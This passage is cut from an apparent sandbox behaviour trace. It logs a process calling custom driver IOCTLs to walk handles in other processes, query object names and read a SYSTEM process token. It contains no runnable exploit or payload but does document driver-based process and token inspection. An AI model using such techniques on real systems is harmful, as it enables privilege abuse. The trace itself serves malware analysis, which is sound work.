PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.590] ObReferenceObjectByHandle (in: Handle=0x658, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003aa33e0, HandleInformation=0x0) returned 0x0 [0244.590] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.590] PsReleaseProcessExitSynchronization () returned 0x2 [0244.590] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.590] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.590] ObfDereferenceObject (Object=0xfffffa8003aa33e0) returned 0x13 [0244.590] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.590] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.590] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.590] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0244.590] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.590] PsAcquireProcessExitSynchronization () returned 0x0 [0244.590] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.590] ObReferenceObjectByHandle (in: Handle=0x65c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002488070, HandleInformation=0x0) returned 0x0 [0244.590] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.590] PsReleaseProcessExitSynchronization () returned 0x2 [0244.590] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.590] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.590] ObfDereferenceObject (Object=0xfffffa8002488070) returned 0x11 [0244.590] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.591] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.591] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.591] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xdc, lpOverlapped=0x0) returned 1 [0244.591] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.591] PsAcquireProcessExitSynchronization () returned 0x0 [0244.591] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.591] ObReferenceObjectByHandle (in: Handle=0x668, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80022de3a0, HandleInformation=0x0) returned 0x0 [0244.591] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.591] PsReleaseProcessExitSynchronization () returned 0x2 [0244.591] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.591] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.591] ObfDereferenceObject (Object=0xfffffa80022de3a0) returned 0x3 [0244.591] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.591] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.591] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.591] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0244.591] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.591] PsAcquireProcessExitSynchronization () returned 0x0 [0244.591] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.591] ObReferenceObjectByHandle (in: Handle=0x6c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002198f20, HandleInformation=0x0) returned 0x0 [0244.591] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.591] PsReleaseProcessExitSynchronization () returned 0x2 [0244.591] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.591] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.591] ObfDereferenceObject (Object=0xfffffa8002198f20) returned 0x1 [0244.591] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.591] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.591] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.591] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0244.591] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.591] PsAcquireProcessExitSynchronization () returned 0x0 [0244.591] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.592] ObReferenceObjectByHandle (in: Handle=0x6c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000f62610, HandleInformation=0x0) returned 0x0 [0244.592] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.592] PsReleaseProcessExitSynchronization () returned 0x2 [0244.592] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.592] ObQueryNameString (in: Object=0xfffff8a000f62610, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.592] ObfDereferenceObject (Object=0xfffff8a000f62610) returned 0x7 [0244.592] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.592] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x338) returned 0xc8 [0244.592] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0244.592] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8003801b30, HandleInformation=0x0) returned 0x0 [0244.592] ObOpenObjectByPointer (in: Object=0xfffffa8003801b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000588) returned 0x0 [0244.592] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xd0 [0244.592] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000588, DesiredAccess=0x8, TokenHandle=0xfffffa80030b9a00 | out: TokenHandle=0xfffffa80030b9a00*=0xc4) returned 0x0 [0244.592] ZwClose (Handle=0xffffffff80000588) returned 0x0 [0244.592] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.592] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0244.592] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0244.866] CloseHandle (hObject=0xc4) returned 1 [0244.866] CloseHandle (hObject=0xc8) returned 1 [0244.866] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.866] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0244.866] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.866] PsAcquireProcessExitSynchronization () returned 0x0 [0244.866] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.866] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003554f20, HandleInformation=0x0) returned 0x0 [0244.866] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.866] PsReleaseProcessExitSynchronization () returned 0x2 [0244.866] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.866] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.866] ObfDereferenceObject (Object=0xfffffa8003554f20) returned 0x1 [0244.866] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.866] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.866] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.867] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0244.867] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.867] PsAcquireProcessExitSynchronization () returned 0x0 [0244.867] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.867] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036f7a80, HandleInformation=0x0) returned 0x0 [0244.867] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.867] PsReleaseProcessExitSynchronization () returned 0x2 [0244.867] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.867] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.867] ObfDereferenceObject (Object=0xfffffa80036f7a80) returned 0x1 [0244.867] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.867] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.867] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.867] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0244.867] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.867] PsAcquireProcessExitSynchronization () returned 0x0 [0244.867] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.867] ObReferenceObjectByHandle (in: Handle=0x110, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0244.867] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.867] PsReleaseProcessExitSynchronization () returned 0x2 [0244.867] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.868] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.868] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0244.868] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.868] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.868] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.868] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0244.868] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.868] PsAcquireProcessExitSynchronization () returned 0x0 [0244.868] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.868] ObReferenceObjectByHandle (in: Handle=0x118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0244.868] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.868] PsReleaseProcessExitSynchronization () returned 0x2 [0244.868] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.868] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.868] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0244.868] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.868] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.868] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.868] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x44, lpOverlapped=0x0) returned 1 [0244.868] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.868] PsAcquireProcessExitSynchronization () returned 0x0 [0244.868] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.868] ObReferenceObjectByHandle (in: Handle=0x15c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003837da0, HandleInformation=0x0) returned 0x0 [0244.868] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.869] PsReleaseProcessExitSynchronization () returned 0x2 [0244.869] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.869] ObQueryNameString (in: Object=0xfffffa8003410d40, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.869] ObfDereferenceObject (Object=0xfffffa8003837da0) returned 0x1 [0244.869] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.869] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.869] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.869] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x42, lpOverlapped=0x0) returned 1 [0244.869] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.869] PsAcquireProcessExitSynchronization () returned 0x0 [0244.869] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.869] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003833dd0, HandleInformation=0x0) returned 0x0 [0244.869] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.869] PsReleaseProcessExitSynchronization () returned 0x2 [0244.869] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.869] ObQueryNameString (in: Object=0xfffffa8003410d40, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.869] ObfDereferenceObject (Object=0xfffffa8003833dd0) returned 0x1 [0244.869] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.869] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.869] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.869] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0244.869] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.870] PsAcquireProcessExitSynchronization () returned 0x0 [0244.870] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.870] ObReferenceObjectByHandle (in: Handle=0x20c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003862c80, HandleInformation=0x0) returned 0x0 [0244.870] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.870] PsReleaseProcessExitSynchronization () returned 0x2 [0244.870] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.870] ObQueryNameString (in: Object=0xfffffa8003862c80, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.870] ObfDereferenceObject (Object=0xfffffa8003862c80) returned 0x1 [0244.870] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.870] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.870] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.870] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x28, lpOverlapped=0x0) returned 1 [0244.870] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.870] PsAcquireProcessExitSynchronization () returned 0x0 [0244.870] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.870] ObReferenceObjectByHandle (in: Handle=0x298, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003870f20, HandleInformation=0x0) returned 0x0 [0244.870] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.870] PsReleaseProcessExitSynchronization () returned 0x2 [0244.870] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.870] ObQueryNameString (in: Object=0xfffffa8003870f20, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.871] ObfDereferenceObject (Object=0xfffffa8003870f20) returned 0x3 [0244.871] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.871] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.871] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.871] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0244.871] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.871] PsAcquireProcessExitSynchronization () returned 0x0 [0244.871] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.871] ObReferenceObjectByHandle (in: Handle=0x2c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800387aa50, HandleInformation=0x0) returned 0x0 [0244.871] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.871] PsReleaseProcessExitSynchronization () returned 0x2 [0244.872] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.872] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.872] ObfDereferenceObject (Object=0xfffffa800387aa50) returned 0x1 [0244.872] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.872] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.872] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.872] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x56, lpOverlapped=0x0) returned 1 [0244.872] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.872] PsAcquireProcessExitSynchronization () returned 0x0 [0244.872] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: 